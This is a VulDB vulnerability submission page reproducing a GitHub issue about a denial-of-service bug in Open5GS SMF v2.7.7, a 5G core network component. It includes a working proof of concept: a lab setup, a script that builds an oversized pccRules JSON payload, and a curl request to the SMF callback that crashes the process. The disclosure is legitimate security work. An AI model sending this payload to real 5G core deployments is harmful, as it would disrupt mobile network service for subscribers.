Soumettre #808480: Open5gs SMF v2.7.7 Denial of Serviceinformation

Titre	Open5gs SMF v2.7.7 Denial of Service
Description	### Open5GS Release, Revision, or Tag v2.7.7 ### Steps to reproduce SMF crashes when an `sm-policy-notify` callback carries a `SmPolicyDecision` whose `pccRules` map contains more entries than the fixed `sess->policy.pcc_rule` array can hold. `update_authorized_pcc_rule_and_qos()` copies each PCC rule into `sess->policy.pcc_rule[sess->policy.num_of_pcc_rule]` and increments the count without any upper-bound check: ```c ogs_pcc_rule_t *pcc_rule = &sess->policy.pcc_rule[sess->policy.num_of_pcc_rule]; ... sess->policy.num_of_pcc_rule++; ``` But the array size is fixed at `OGS_MAX_NUM_OF_PCC_RULE == 8`. In live Docker, a callback with `20` valid PCC rules corrupted the subsequent slot state badly enough that the handler hit: ```c ogs_assert(pcc_rule->num_of_flow == 0); ``` while processing later overflowed entries, aborting the SMF process. This issue is not a duplicate of the existing `oversized-flowInfos` report. That earlier bug overflows the per-rule `flow[]` array; this one overflows the top-level per-session `pcc_rule[]` array. ### Steps to reproduce 1. Start the Open5GS live Docker lab. 2. Bring up UERANSIM gNB and UE with the provided configs: ```bash docker run -d --rm --name smf-audit-gnb \ --network open5gs --network-alias gnb.ueransim.org \ -v /home/ubuntu/docker-open5gs/configs/internal/ueransim/gnb.yaml:/ueransim/config/gnb.yaml:ro \ free5gc/ueransim:latest /ueransim/nr-gnb -c /ueransim/config/gnb.yaml docker run -d --rm --name smf-audit-ue \ --network open5gs --network-alias ue.ueransim.org \ --cap-add NET_ADMIN --privileged \ -v /home/ubuntu/docker-open5gs/configs/internal/ueransim/ue.yaml:/ueransim/config/ue.yaml:ro \ free5gc/ueransim:latest /ueransim/nr-ue -c /ueransim/config/ue.yaml -r ``` 3. Wait until the UE log shows: ```text PDU Session establishment is successful PSI[1] ``` 4. Send the forged callback to the active `smContextRef` (`1` in this run): ```bash payload=$(python3 - <<'PY' import json rules = {} qos = {} for i in range(20): rid = f"r{i}" qid = f"q{i}" rules[rid] = { "pccRuleId": rid, "precedence": i + 1, "refQosData": [qid], "flowInfos": [{ "flowDirection": "UPLINK", "flowDescription": f"permit out ip from 10.0.{i}.1 1000 to any" }] } qos[qid] = {"qosId": qid, "5qi": 1, "priorityLevel": 1} body = {"smPolicyDecision": {"pccRules": rules, "qosDecs": qos}} print(json.dumps(body, separators=(",", ":"))) PY ) curl --http2-prior-knowledge -m 5 -sS -i \ -X POST http://10.33.33.10/nsmf-callback/v1/sm-policy-notify/1/update \ -H 'content-type: application/json' \ --data "$payload" ``` 5. Check SMF state and logs: ```bash docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' smf docker logs --since 2026-04-10T20:44:36Z smf ``` ### Logs ```shell curl: (56) Recv failure: Connection reset by peer exited 139 2026-04-10T20:44:44.519843635Z 04/10 20:44:44.429: [smf] FATAL: update_authorized_pcc_rule_and_qos: Assertion `pcc_rule->num_of_flow == 0' failed. (../src/smf/npcf-handler.c:183) ``` ### Expected behaviour SMF should reject oversized `pccRules` input with a normal HTTP error response. ### Observed Behaviour The callback resets the connection and the SMF process exits with code `139`. ### eNodeB/gNodeB UERANSIM gNB v3.2.7 ### UE Models and versions UERANSIM UE v3.2.7
La source	⚠️ https://github.com/open5gs/open5gs/issues/4445
Utilisateur	FrankLin (UID 97501)
Soumission	20/04/2026 21:05 (il y a 1 mois)
Modérer	10/05/2026 16:40 (20 days later)
Statut	Accepté
Entrée VulDB	362548 [Open5GS jusqu’à 2.7.7 SMF /src/smf/npcf-handler.c update_authorized_pcc_rule_and_qos déni de service]
Points	20

◂ Précédent Aperçu Suivant ▸

Interested in the pricing of exploits?

See the underground prices here!